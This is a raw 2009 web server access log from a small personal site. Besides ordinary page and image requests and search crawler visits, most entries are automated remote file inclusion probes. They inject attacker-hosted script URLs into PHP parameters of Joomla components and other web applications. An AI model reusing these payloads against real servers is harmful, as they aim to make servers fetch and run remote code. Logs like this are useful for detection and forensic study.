70.95.88.205 - - [13/Mar/2009:02:43:13 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:13 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:13 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:13 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:13 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
96.9.45.2 - - [13/Mar/2009:02:43:13 -0500] "GET /logs/access_log.1219104000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
96.9.45.2 - - [13/Mar/2009:02:43:13 -0500] "GET /logs/access_log.1219795200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
81.169.143.242 - - [13/Mar/2009:02:44:26 -0500] "GET /logs/?DOCUMENT_ROOT=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 200 122039 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:44:27 -0500] "GET /?DOCUMENT_ROOT=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:44:53 -0500] "GET /logs/?DOCUMENT_ROOT=http://kazandoska.ru/albid.txt?? HTTP/1.1" 200 122039 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:44:53 -0500] "GET /?DOCUMENT_ROOT=http://kazandoska.ru/albid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:45:02 -0500] "GET /logs/?DOCUMENT_ROOT=http://kazandoska.ru/albid.txt?? HTTP/1.1" 200 122039 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:45:02 -0500] "GET /?DOCUMENT_ROOT=http://kazandoska.ru/albid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:45:45 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 297 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.169.143.242 - - [13/Mar/2009:02:45:45 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 292 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.17.183.214 - - [13/Mar/2009:02:45:46 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.17.183.214 - - [13/Mar/2009:02:45:49 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.17.183.214 - - [13/Mar/2009:02:48:16 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
83.17.183.214 - - [13/Mar/2009:02:48:19 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
83.17.183.214 - - [13/Mar/2009:02:48:21 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
83.17.183.214 - - [13/Mar/2009:02:49:42 -0500] "GET /logs/access_log.1211500800//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.17.183.214 - - [13/Mar/2009:02:50:11 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
83.17.183.214 - - [13/Mar/2009:02:51:31 -0500] "GET /logs/access_log.1211500800//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
81.169.143.242 - - [13/Mar/2009:02:52:21 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:52:22 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.69"
83.167.62.172 - - [13/Mar/2009:02:53:05 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
81.169.143.242 - - [13/Mar/2009:02:53:58 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:53:59 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.69"
218.38.55.195 - - [13/Mar/2009:02:54:27 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.55.195 - - [13/Mar/2009:02:54:27 -0500] "GET /logs/access_log.1216512000%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.38.55.195 - - [13/Mar/2009:02:54:27 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.40.226.34 - - [13/Mar/2009:02:56:55 -0500] "GET /logs/access_log.1219449600//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
218.38.55.195 - - [13/Mar/2009:02:57:52 -0500] "GET /logs/access_log.1217289600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
91.121.112.152 - - [13/Mar/2009:02:59:59 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://www.melhoreseremdois.com//plugins/safehtml/Help01.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
91.121.112.152 - - [13/Mar/2009:02:59:59 -0500] "GET //skin/zero_vote/error.php?dir=http://www.melhoreseremdois.com//plugins/safehtml/Help01.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
91.121.112.152 - - [13/Mar/2009:02:59:59 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.melhoreseremdois.com//plugins/safehtml/Help01.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
91.121.112.152 - - [13/Mar/2009:02:59:59 -0500] "GET /logs/access_log.1211500800//skin/zero_vote/error.php?dir=http://www.melhoreseremdois.com//plugins/safehtml/Help01.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
211.202.2.220 - - [13/Mar/2009:03:00:38 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:00:38 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:00:38 -0500] "GET /logs/access_log.1214352000%20%20//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:00:57 -0500] "GET /logs/access_log.1214956800%20%20//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.188 - - [13/Mar/2009:03:02:15 -0500] "GET /logs/access_log.1214352000/index.php?content=http://www.mercedesov.ru/b9db6c07db56bc6c5fb1b607061f731e/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
121.254.170.200 - - [13/Mar/2009:03:02:59 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/kokorotonomo/injek.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.30.142.163 - - [13/Mar/2009:03:04:03 -0500] "GET /logs/access_log.1157932800 HTTP/1.0" 200 363401 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.202.2.220 - - [13/Mar/2009:03:04:32 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:04:33 -0500] "GET /logs/access_log.1214352000%20%20//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:04:36 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:04:54 -0500] "GET /logs/access_log.1214956800%20%20//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:05:35 -0500] "GET /logs/access_log.1211328000//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.254.49.34 - - [13/Mar/2009:03:07:39 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
65.254.49.34 - - [13/Mar/2009:03:07:39 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
119.63.193.55 - - [13/Mar/2009:03:08:38 -0500] "GET / HTTP/1.1" 200 1243 "-""Baiduspider+(+http://help.baidu.jp/system/05.html)"
211.202.2.220 - - [13/Mar/2009:03:09:52 -0500] "GET /logs/access_log.1211328000//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.115.111.242 - - [13/Mar/2009:03:10:38 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1694 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
78.40.226.34 - - [13/Mar/2009:03:11:16 -0500] "GET /logs/access_log.1217030400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
78.40.226.34 - - [13/Mar/2009:03:12:39 -0500] "GET /logs/access_log.1214352000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
222.236.47.188 - - [13/Mar/2009:03:12:58 -0500] "GET /logs/access_log.1214352000/index.php?id=http://www.mercedesov.ru/b9db6c07db56bc6c5fb1b607061f731e/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
78.40.226.34 - - [13/Mar/2009:03:13:40 -0500] "GET /logs/access_log.1215302400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
208.115.111.242 - - [13/Mar/2009:03:16:51 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.242 - - [13/Mar/2009:03:17:27 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
195.47.67.57 - - [13/Mar/2009:03:18:36 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:18:36 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:18:36 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:18:37 -0500] "GET /logs/access_log.1217721600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:18:40 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:18:40 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:18:40 -0500] "GET /logs/access_log.1217721600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:18:41 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:18:43 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:18:43 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:18:43 -0500] "GET /logs/access_log.1217721600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:18:44 -0500] "GET /logs/access_log.1217721600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:19:05 -0500] "GET /logs/access_log.1219536000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:19:08 -0500] "GET /logs/access_log.1219536000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:19:10 -0500] "GET /logs/access_log.1219536000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:20:11 -0500] "GET /logs/access_log.1219536000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:21:05 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:21:05 -0500] "GET /logs/access_log.1217376000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:21:05 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:21:08 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:21:08 -0500] "GET /logs/access_log.1217376000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:21:08 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.12.178 - - [13/Mar/2009:03:24:06 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://zinc.free-site-host.com/v6zid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
218.38.12.178 - - [13/Mar/2009:03:24:06 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://zinc.free-site-host.com/v6zid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
218.38.12.178 - - [13/Mar/2009:03:24:06 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://zinc.free-site-host.com/v6zid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:03:26:12 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:26:12 -0500] "GET /logs/access_log.1215043200%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:26:12 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
78.40.226.34 - - [13/Mar/2009:03:26:15 -0500] "GET /logs/index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
78.40.226.34 - - [13/Mar/2009:03:26:15 -0500] "GET /index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
218.38.12.178 - - [13/Mar/2009:03:26:33 -0500] "GET /logs/access_log.1202428800%20//faqsupport/samplefaqsupport.php?path[docroot]=http://zinc.free-site-host.com/v6zid.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
72.30.142.163 - - [13/Mar/2009:03:26:40 -0500] "GET /logs/access_log.1211328000 HTTP/1.0" 200 386953 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.47.67.57 - - [13/Mar/2009:03:26:41 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:26:45 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:26:45 -0500] "GET /logs/access_log.1215043200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:26:45 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:26:46 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:26:49 -0500] "GET /logs/access_log.1215043200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:26:51 -0500] "GET /logs/access_log.1216425600//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:27:01 -0500] "GET /logs/access_log.1216425600//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:27:18 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:27:18 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:27:18 -0500] "GET /logs/access_log.1215043200%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:27:19 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:27:19 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:27:19 -0500] "GET /logs/access_log.1215043200%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:27:27 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:27:27 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:27:27 -0500] "GET /logs/access_log.1215043200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:27:41 -0500] "GET /logs/access_log.1216425600//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:29:25 -0500] "GET /logs/access_log.1218931200%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:29:26 -0500] "GET /logs/access_log.1218931200%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
218.38.55.195 - - [13/Mar/2009:03:29:52 -0500] "GET /logs/access_log.1216252800//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.17.183.214 - - [13/Mar/2009:03:32:41 -0500] "GET //skin/zero_vote/error.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
83.17.183.214 - - [13/Mar/2009:03:32:41 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
83.17.183.214 - - [13/Mar/2009:03:32:41 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
83.17.183.214 - - [13/Mar/2009:03:32:56 -0500] "GET /logs/access_log.1211500800//skin/zero_vote/error.php?dir=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
72.30.142.163 - - [13/Mar/2009:03:33:06 -0500] "GET /logs/access_log.1202428800 HTTP/1.0" 200 317084 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.184 - - [13/Mar/2009:03:33:32 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.184 - - [13/Mar/2009:03:33:32 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://www.ringsworld.com/history/5.html""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.254.49.34 - - [13/Mar/2009:03:39:03 -0500] "GET /logs/access_log.1219449600//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
211.202.2.220 - - [13/Mar/2009:03:43:35 -0500] "GET /logs/access_log.1217289600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:03:43:35 -0500] "GET //membership/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:03:43:35 -0500] "GET /logs//membership/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:03:43:35 -0500] "GET /logs/access_log.1216425600%20%20//membership/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:43:36 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
